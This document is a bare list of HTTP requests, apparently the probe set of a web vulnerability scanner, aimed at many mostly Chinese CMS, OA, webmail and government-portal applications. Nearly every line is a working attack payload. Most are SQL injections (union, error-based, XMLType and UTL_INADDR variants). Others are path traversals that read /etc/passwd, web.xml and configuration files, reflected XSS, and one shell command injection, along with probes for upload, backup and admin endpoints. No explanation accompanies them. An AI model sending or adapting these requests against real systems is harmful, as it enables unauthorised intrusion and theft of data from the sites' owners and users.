GET /cms/jsp/communique/zwxx_zfgb.jsp?more=1&columnNameValue=2%27%20UNION%20ALL%20SELECT%20chr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%20FROM%20DUAL--&moreZongQi=021
GET /datacenter/global/login.do?bg=../../../../../../../../../../etc/passwd
GET /user/?q=help&type=search&page=1&kw=webscan%22;%20alert(42873);//&lang=zh_CN
GET /admin?code=1&n=webscan%22%20onmouseover=alert(42873);%20//
GET /admin/manage.jsp
GET /shipinbofang.jsp?TID=-1234'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL%20FROM%20DUAL--%20&ColumnID=86
GET /content/detail.php?sid=2%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7765627363616E3A693A66696E64,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&cid=105&id=1
POST /mod/shop/quest/ajax.php?op=auction_buy
GET /wei/js.php?type=like&keyword=1%2527)/**/UNION/**/SELECT/**/1,concat(0x7e,0x7765627363616E3A693A66696E64,0x7e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23
GET /news/js.php?type=like&keyword=1%2527)/**/and/**/(select/**/1/**/from/**//**/(select/**/count(*),concat((select/**/concat(0x7e,0x7765627363616E3A693A66696E64,0x7e)/**/from/**/1tc_members/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**//**/information_schema.tables/**/group/**/by/**/x)a)%23
POST /mod/payment/quest.php?op=check&page=b2b
POST /mod/ntga/jwsview.php
POST /uploadd.php
GET /jserr.php?jsstr=%3Cimg%20src=@%20onerror=alert(42873)%20/%3E
GET /admin/backup.aspx
POST /mod/mad/video_upload.php
GET /business/buildingrooms_xml.asp?cancelBldroomShow=2&client_buildID=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&client_mainno=0&client_mainTable=unrelatedresource&client_realtypeID=-1&client_showMode=&client_showRoomCond=&client_stanID=1610&floorEnd=-100&floorStart=-100&functiontype=6&pmBldRoomID=undefined&roomNoEnd=-100&roomNoStart=-100&sid=
GET /SelNews.aspx?NewsType=DongTaiNewsType=1'%20and%201=char(106)%20--
GET /Website/OnlineSurveyResults.jsp?idhao=1'%20union%20all%20select%20null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%7C%7Cchr(60)%20from%20sysibm.sysdummy1--
POST /frontProduct/search.ac
GET /Website/contentshow.jsp?ColumnCode=-12'%20union%20all%20select%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)%20from%20DUAL%20--
GET /Website/newsshow.jsp?id=-12%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL%20FROM%20DUAL
GET /FileManages/NetworkDisk/QxSet1.aspx?id=38%20%20and+1=char(106)+--
GET /website/approve/convenientSiteAction!getSXList.action?department=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&mill=488&style=4
GET /website/approve/approveSiteAction!listApproveModel.action?action=search&forward=searchmodel&issueTypename=&style=4&subType=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
GET /website/approve/approveSiteAction!findApproveGuide.action?businesscode=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&location=&subcode=000
GET /bookdetail.aspx?id=-311%20union%20all%20Select%208%2CCHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8--
GET /znSearchAction.do?searchContext=-1%25%27%20UNION%20%20ALL%20SELECT%20%20NULL%2CNULL%2CCHR%28119%29%7C%7CCHR%28101%29%7C%7CCHR%2898%29%7C%7CCHR%28115%29%7C%7CCHR%2899%29%7C%7CCHR%2897%29%7C%7CCHR%28110%29%7C%7CCHR%2858%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7CCHR%28102%29%7C%7CCHR%28105%29%7C%7CCHR%28110%29%7C%7CCHR%28100%29%2CNULL%20FROM%20DUAL%20--
GET /opac/ckgc.jsp?kzh=-1')%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
GET /cms/framework/dbfile/createdbfile.jsp
HEAD /CN/item/downloadFile.jsp?filedisplay=../../web-inf/web.xml
GET /servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../../../../etc/passwd
GET /FileManages/FolderQxSet/FileModify.aspx?type=2&fileid=3%20and+1=char(106)%20--&path=/1
GET /interface/ugo.php?OA_USER=aa%2527%20and%201=(select%201%20from(select%20count(*),concat(0x7c,0x484B3A693A31393937,0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20%25271%2527=%25271
GET /inc/finger/use_finger.php?USER_ID=-123%bf'%20and%20extractvalue(1,%20concat(0x5c,(select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201)))%23
GET /general/ems/query/search_excel.php?LOGIN_USER_ID=1%bf%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23&EMS_TYPE=1
GET /general/ems/manage/search_excel.php?LOGIN_USER_ID=1&EMS_TYPE=1%e5%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23
GET /backup/backup/backup.asp
GET /module/AIP/get_file.php?MODULE=/&ATTACHMENT_ID=.._webroot/inc/oa_config&ATTACHMENT_NAME=php
HEAD /general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php
GET /admini/item/iteminfo.aspx
GET /admini/newstopic/newstopicinfo.aspx
HEAD /download?fileName=/WEB-INF/web.xml
GET /RecruitstuManage/schoolinfo/DetailTheme.aspx?type=-1&topicid=1'%20and%201=char(106)%20--
POST /index_lnlqcj.php
GET /main/model/childcatalog/fileFind.do?fcode=00103&title=-111%25%27%20union%20all%20select%20null%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--&Submit=%CB%D1%CB%F7
GET /scrp/feedbackdetail.cfm?iSno=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
GET /poweb/CDHelp.jsp?ISOID=3'%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,char%28104%29%2bchar%28107%29%2bchar%2858%29%2bchar%2849%29%2bchar%2858%29%2bchar%2849%29%2bchar%2857%29%2bchar%2857%29%2bchar%2855%29,null,null,null%20%20--%20
POST /information/OA_InforList.asp
GET /information/OA_PingLun.asp?PLType=1&POAID=54'%20and+1=char(106)%20--
POST /information_manager/informationmanager_upload.jsp?upload=1&dispControl=null&saveControl=null
POST /public/jsp/multiuploadfile.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&photos=null
POST /public/jsp/smartUploadPic.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jspx,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0
GET /jdwz/qtpage/findAllPoint.jsp?dtcxlb=vcsfjg&point_name=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2CNULL--%20&vcsfjg=all
GET /jdwz/newsAction.do?flag=flag&NewsId=-12'%20union%20all%20select%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29,12,12,12,12,12,12,12,12--
GET /caigou/NoticeList.aspx?Type=%27%2b+(select+convert(int%2cCHAR(106)%2bCHAR(105)%2bCHAR(120))+FROM+syscolumns)+%2b%27
GET /MailExportDo.asp?dellist=-1234%29%20or%203438%3DCONVERT%28INT%2C%28SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2b%28SELECT%20%28CASE%20WHEN%20%288986%3D8986%29%20THEN%20CHAR%28105%29%20ELSE%20CHAR%2848%29%20END%29%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%29%29%20%20AND%20%281602%3D1602
POST /mailClassInfor.asp
GET /MessageInfoDis.asp?VOID=26%20and%201122%3DCONVERT%28INT%2C%28SELECT%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%29%29%20--
GET /Include/DepartmentSet_Right.aspx?BI_ID=1'%20and%20(select%2b(char(106)%2bchar(120)%2bchar(106)%2bchar(120)))%3E0--
HEAD /jcms/m_1_9/user/down.jsp?pathfile=../jcms/m_1_9/user/down.jsp
GET /tophp.asp
POST /Manage/CalendarMemo/event.ashx
GET /RuvarHRM/web_common/file_download.aspx?hr_file_storage_id=1')%20and%20(select%20char(106)%2bchar(106))%3E0--
GET /SysManage/bbsSet/BoardInfo.aspx?board_id=-1'%20and%20(select%20char(106)%2bchar(106))%3E0--&level=1
GET /SysManage/include/SelectUnderling.aspx?u_underling=(select%20char(106)%2bchar(106)))--'
GET /SysManage/MailSet/select_mail.aspx?corp_id=(select%20char(106)%2bchar(106))%20--
GET /workflow/OfficeFileDownload.aspx?filename=1'%20and%20(select%20char(106)%2bchar(106))%3E0%20--
GET /SysManage/get_department.aspx?corpID=char(106)%2bchar(106)
GET /SysManage/role_setting_new.aspx?id=char(106)%2bchar(106)
GET /resource/jpk/search.jsp?coursetype=0&applyyear=0&university=%CF%C3%C3%C5%B4%F3%D1%A7&subject1=0&subject2=0&name=%25%27%20AND%201122%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%28104%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2849%29%7C%7CCHR%2857%29%7C%7CCHR%2857%29%7C%7CCHR%2855%29%29%29%20FROM%20DUAL%29%20AND%20%27%25%27%3D%27
GET /oa/download_attach.aspx?attach_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
GET /SysManage/departmentset_corpshow.aspx?bi_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
GET /SysManage/role_show.aspx?role_id=char(106)%2bchar(106)
GET /lates/index.html?username=123%27%2f%2a%2a%2fand%2f%2a%2a%2f%28seleselectct%2f%2a%2a%2f1%2f%2a%2a%2ffrom%2f%2a%2a%2f%28selselectect%2f%2a%2a%2fcount%28%2a%29%2Cconcat%280x7c%2C0x7765627363616E3A693A66696E64%2C0x7c%2Cfloor%28rand%280%29%2a2%29%29x%2f%2a%2a%2ffrom%2f%2a%2a%2finformation_schema.tables%2f%2a%2a%2fgroup%2f%2a%2a%2fby%2f%2a%2a%2fx%29a%29%23
POST /kaoqin/JiaoYanDis.asp
GET /admin/accounts_list.aspx?u_department_id=1'%20and%20(char(106)%2bchar(106))%3E0--
GET /tj/list.aspx?typeid=1'%20and%20(char(106)%2bchar(106))%3E0--
GET /filemanage/FolderPower.aspx?folder=1'%20and%20(char(106)%2bchar(106))%3E0--
GET /OperationManage/ViewSecrecyGuestBookMessage.aspx?sn=-12'%20and%20(char(106)%2bchar(106))%3E0--&sp=amdin&oid=0&type=2
POST /Manage/CalendarMemo/load.ashx
GET /php/report/include/ldap.inc
GET /php/report/include/util.inc
GET /php/report/include/config.inc
GET /php/report/lastlogin_list_export.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
GET /user/storage_explore.php
GET /grad/admin/domain_logo.php
GET /user/storage_fold_explore.php
GET /php/mailaction1.php?action=x&index=1.2;echo+123456%3Ex1.txt
POST /user/send_queue/upload_addition.php
GET /php/report/search_lastlogin.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
GET /php/bill/list_userinfo.php?domain=site.org&ok=1&cp=1%20union%20select%20md5(1122),2,3,4,5%23
POST /grad/admin/admin_logo_upload.php
GET /common/codewidget.jsp?code=1'%20AND%201=char(106)%20--
HEAD /download.ashx?files=../web.config
GET /mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise
GET /?question/search/%27%75nion%20select%201,2,3,4,5,6,7,8,md5(1122),10,11,12,13,14,15,16,17,18,19,20%23
HEAD /jcms/m_1_9/user/down.jsp?abspathfile=/etc/passwd
GET /Edit/ShowEdit.aspx?Dir=../../&OpenWords=TxtTagKey
GET /jis/manage/databak/showlog.jsp?path=../showlog.jsp
HEAD /download.jsp?path=UserFiles/../download.jsp
GET /tt/trade/register.asp?step=checkdup&checkname=ologinname&checkval=haha'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&pk=0
GET /zwgkinfo/DepartMentInfoList.aspx?CategoryNum=-12'/**/and/**/1=char(106)--&DeptCode=
GET /jis/interface/offer.jsp?flag=user
HEAD /jis/down.jsp?pathfile=./down.jsp%00.jpg
GET /MockLogin.aspx
GET /mobile/user.php?act=order_list
GET /seeyon/management/status.jsp
HEAD /api/download.ashx?fid=nUDWEgdorSH4j/+9GiQTlA==
GET /monitoring?part=web.xml
GET /?/s_tag/hehe%25%27%20union%20select%201,2,3,md5(1122),5,6,7%20from%20go_admin%23
GET /download.action?fullPath=./WEB-INF/web.xml
GET /jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig
POST /jis/update/update.jsp?fn_billstatus=U
GET /install/install.php
GET /public/minify.php?f=../ooxxooxxo/hehe.js
GET /admin/index.asp
GET /plus/outside.php?id=../template/default/style/yun_index.css%00
GET /productpic.aspx?id=100611)%20and%201=char(106)%20--
GET /jsp/util/file_download.jsp?filePath=../../../../../../../etc/passwd
GET /jsp/util/file_download.jsp?filePath=c:%5Cwindows%5Cwin.ini%00.xml
POST /jcms/m_5_5/m_5_5_3/import.jsp
POST /upload!uploadImg.action
GET /AuthReturn.aspx?APTokenResponse=a$8SOIYyiGVYBge5mdoY5nIeAueY7BixUtLdHqpy8o3RqM9hVnisaXAA==
POST /?do=index&mod=goods
GET /index.php/*123*/'union/**/select/**/1,2,3,4,5,6,7,8,md5(1122),10,11%23&action=getatlbyid
GET /cart.aspx?act=spikebuy&spikeid=3%20and%201=char(106)%2bchar(120)%20--
HEAD /webmail/client/mail/index.php?module=operate&action=down&file=./../../mainconfig.php
GET /MoreIndex.aspx?pkId=6434&kw=a'%20and%201=char(106)%20--&st=2&t=1
GET /RuvarHRM/web_include/select_baseinfo.aspx?bt_name=1')%20%20and%20(char(106)%2bchar(106))%3E0--
GET /Default.aspx?item=1)%20and%201=(char(106)%2bchar(106))%20--
GET /news/searchNewsAction.shtml?keywords='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
GET /zwfw/zwfwInfoAction!execute.shtml?action=5&sid='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
GET /news/newsInfoAction.shtml?infotype=-1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20and%20'at'='at
GET /client/checkuser.aspx?user=test'%20and%20char(106)%3E0--&pwd=1
GET /siteserver/userRole/modal_sendMail.aspx?From=User&UserNameCollection=test'+and+char(106)%2bchar(106)=0%20--
GET /admin/include/config.php?depth=../../templates/default/images/css/metinfo.css%00
GET /admin/login/login_check.php?depth=../../templates/default/images/css/metinfo.css%00&admin_index=1
GET /admin/system/lang/lang.func.php?depth=../../../public/js/public.js%00
GET /webusr/check.aspx?loginname=nosec'%20and%201=char(106)%2bchar(106)%20--%20
POST /plugins/phpdisk_client/client_sub.php?action=upload_file
GET /ExhibitionCenter.aspx?area=-12'%20and/**/1=char(106)/**/--
GET /SupplyList.aspx?parentid=88&classid=-12%20and/**/1=char(106)/**/%20--%20
GET /company/SearchProducts.aspx?id=115&keyname=ppp%25'%20and/**/1=char(106)/**/%20--%20
POST /Web/Login.aspx
POST /Web/KeySearch.aspx?searchid=1234
GET /portal/admin/setright.aspx?id=-1
GET /infolist.aspx?ClassId=5)%20and%201122=CONVERT(INT,(SELECT%20CHAR(84)%2bCHAR(97)%2bCHAR(105)%2bCHAR(87)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(103)%2bCHAR(111)%2bCHAR(58)%2bCHAR(104)%2bCHAR(111)%2bCHAR(109)%2bCHAR(101)))%20AND%20(1=1
GET /guestbook.aspx?do=show&id=1%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,char(106)%2bchar(106)%2bchar(108)%20--
HEAD /prog/filedown.php?pe_id=MQ==
POST /emlib4/system/DataSource/GetDataGridCtrlResult.aspx?_debug_=undefined
GET /emlib4/format/release/aspx/eml_userwh.aspx
GET /voteresult.aspx?activeid=-1%20UNION%20SELECT%201,char(106)%2bchar(106),3,4,5%20from%20syscolumns%20--
GET /kbase_list.aspx?kcatid=1%20UNION%20SELECT%201,2,char(106)%2bchar(106),4,5,6,7,8%20from%20syscolumns--
GET /getTopLinksPortalCategoriesAction.action?siteId=../../../../../../../../../../windows/win.ini%00.jpg
GET /letter/letter_detail.aspx?id=8'%20%20and+1=char(106)%2bchar(106)%20--
GET /cms/infopub/rss.jsp?channelcode=-A%27%20union%20all%20select%20char%28106%29%2bchar%28106%29%2Cnull%2Cnull%2Cnull%20--&maxnum=20
GET /web/doc_hit.jsp?documentid=-21%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
GET /OperationManage/BlogMoreIndex.aspx?pkId=&blogId=1&kw=abc'%20and%201=char(106)%20--&st=1&t=1
HEAD /Tools/stream/FlvStream.ashx?file=./Index.aspx
GET /tj/total.aspx?act=other&typeid=1%27%20AND%209518%3DCONVERT%28INT%2C%28SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2b%28SELECT%20%28CASE%20WHEN%20%289518%3D9518%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2bCHAR%28100%29%29%29%29%20AND%20%27xhJK%27%3D%27xhJK
GET /webConfigSet/configSetting.aspx?url=/login/index.aspx
GET /cms/cms/infopub/gjjs.jsp?pubtype=S&pubpath=dkt&startdate=&enddate=&topic=&content=&authorname=&origin=&description=&webappcode=A02&searchdir=A02&templetid=-21'%20union%20all%20select%20char(106)%2bchar(62)%2bchar(60),null,null%20--
POST /mydocument/download.aspx
GET /prog/get_passwd_1.php?user=hehe%3Cscript%3Ealert(42873)%3C/script%3E%20
GET /cjwtlist.aspx?t=(select+convert(int%2c@@version))
GET /FormBuilder/PrintFormList.aspx?file_id=1)/**/UNION/**/ALL/**/SELECT/**/CHR(97)%7C%7CCHR(60)%7C%7CCHR(99),NULL/**/FROM/**/DUAL/**/--
GET /module/sitesearch/index.jsp?keyword=&columnid=-1650)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&keyvalue=&webid=&currpage=2
GET /FormBuilder/yjzxList.aspx?id=1/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,CHR(106)%7C%7CCHR(60)%7C%7CCHR(106)/**/FROM/**/DUAL--
GET /FromBaoShan/LaborSpecial/PlacardView.aspx?info_id=1/**/UNION/**/ALL/**/SELECT/**/CHR(106)%7C%7CCHR(106)%7C%7CCHR(106),NULL,NULL,NULL/**/FROM/**/DUAL--
GET /goods/GoodsAdd.aspx?goodsid=1/**/AND/**/1122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&flag=2
GET /pub/search/search_video_view.asp?id=3&mid=4%20and%201122=CONVERT(INT,(SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29))&yh=1
POST /index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
GET /main/findgbm2.asp?sql=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name&sqlbak=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name%20&px=
GET /ebsys/fceform/common/djframe.htm?isfile=release&djsn=eb_runsql
GET /nameedit.asp?table=bbs&id=1%20union%20all%20select%20null,null,null,null,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),null%20--&action=edit
GET /jis/front/sdgs/updateuser.jsp
HEAD /lm/down.jsp?pathfile=down.jsp
